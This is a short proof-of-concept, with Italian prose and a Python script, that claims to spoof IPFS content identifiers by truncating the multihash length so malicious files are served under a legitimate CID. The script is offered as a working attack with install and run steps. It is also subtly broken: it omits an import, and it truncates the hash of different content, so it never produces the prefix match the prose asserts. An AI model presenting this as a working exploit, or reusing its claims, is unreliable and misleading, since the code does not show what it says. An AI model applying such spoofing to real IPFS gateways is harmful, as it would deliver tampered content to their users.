
Prova di concetto in Python che dimostra lo spoofing di CID IPFS tramite estensione della lunghezza del multihash, evidenziando difetti di verifica del content-addressing che possono compromettere i gateway IPFS.
# ipfs_cid_spoof.py - Generates a CID with a different multihash length
import multihash, cid
# Attacker creates a file whose hash, when truncated, matches a different file's prefix
original_content = b"hello"
fake_content = b"hello world"
real_cid = cid.make_cid(1, 'dag-pb', multihash.encode(hashlib.sha256(original_content).digest(), 'sha2-256'))
# Spoofed CID: we can craft a multihash with a shorter length that matches the start of the real one
spoofed_multihash = multihash.encode(hashlib.sha256(fake_content).digest()[:16], 'sha2-256', length=16)
spoofed_cid = cid.make_cid(1, 'dag-pb', spoofed_multihash)
print(f"Real CID: {real_cid}")
print(f"Spoofed CID: {spoofed_cid}")
# If IPFS node only checks prefix, it may serve the wrong content.
Un'implementazione IPFS si fida del campo di lunghezza nel multihash di un CID senza verificare che l'hash stesso corrisponda al contenuto completo. Un attaccante può creare un file il cui hash troncato corrisponde al prefisso dell'hash di un file legittimo e servire il file dannoso con lo stesso CID.
Esegui lo script:
pip install py-multihash py-cid
python ipfs_cid_spoof.py
Mostra che è possibile generare un CID spoofato.